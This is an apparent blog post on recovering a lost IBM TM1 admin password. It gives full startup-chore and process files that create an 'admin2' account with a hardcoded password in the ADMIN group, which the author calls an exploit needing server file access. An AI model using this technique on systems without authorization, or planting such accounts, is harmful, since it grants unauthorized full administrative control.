reset TM1 Admin password

reset TM1 Admin password

Submitted by admin on

It can happen that for various reasons or oversights, admin credentials to a TM1 instance are lost. There are a solutions online to recover from this issue. However, these require removing all passwords from all accounts on the instance. 

So, in this article, I am demonstrating a less brutal option that does not require deleting the }ClientProperties control cube and I am revealing a simple exploit to gain full admin privileges without holding any credentials on the instance in the first place. Please note, this is not an RCE exploit: access to the server where the instance is running is required.

In order to achieve this exploit, use the following steps:

  1. stop your TM1 instance service

  2. add the following line to your TM1 instance tm1s.cfg

    StartupChores=addclient
  3. copy to your TM1 instance folder the addclient.cho and addclient.pro files found below
  4. start your TM1 instance
  5. you can now login with user "admin2" and password "tm1securityisajoke", this account belongs to the ADMIN group, from there you can change passwords on any account including lost credentials on any previous admin accounts.
  6. once you're done with accounts recovery, delete the StartupChores line in your tm1s.cfg, delete this new "admin2" account or at least change its password to something safer.

addclient.cho:


534,10
535,"addclient"
530,20251021075200
537,0
531,001000000
532,1
13,16
6,"addclient"
560,0
533,0
1405,0

addclient.pro:


601,100
602,"addclient"
562,"NULL"
586,
585,
564,
565,""
559,1
928,0
593,
594,
595,
597,
598,
596,
800,
801,
566,0
567,","
588,"."
589,","
568,""""
570,
571,
569,0
592,0
599,1000
560,0
561,0
590,0
637,0
577,0
578,0
579,0
580,0
581,0
582,0
603,0
572,3
AddClient( 'admin2' );
573,1
574,1
575,3
AssignClientToGroup( 'admin2', 'ADMIN' );
AssignClientPassword( 'admin2', 'tm1securityisajoke' );
576,_ParameterConstraints=e30=
930,0
638,1
804,0
1217,1
900,
901,
902,
938,0
937,
936,
935,
934,
932,0
933,0
903,
906,
929,
907,
908,
904,0
905,0
909,0
911,
912,
913,
914,
915,
916,
917,0
918,1
919,0
920,50000
921,""
922,""
923,0
924,""
925,""
926,""
927,""
Categories
admins

Add new comment

About text formats

Plain text

  • No HTML tags allowed.
  • Lines and paragraphs break automatically.
  • Web page addresses and email addresses turn into links automatically.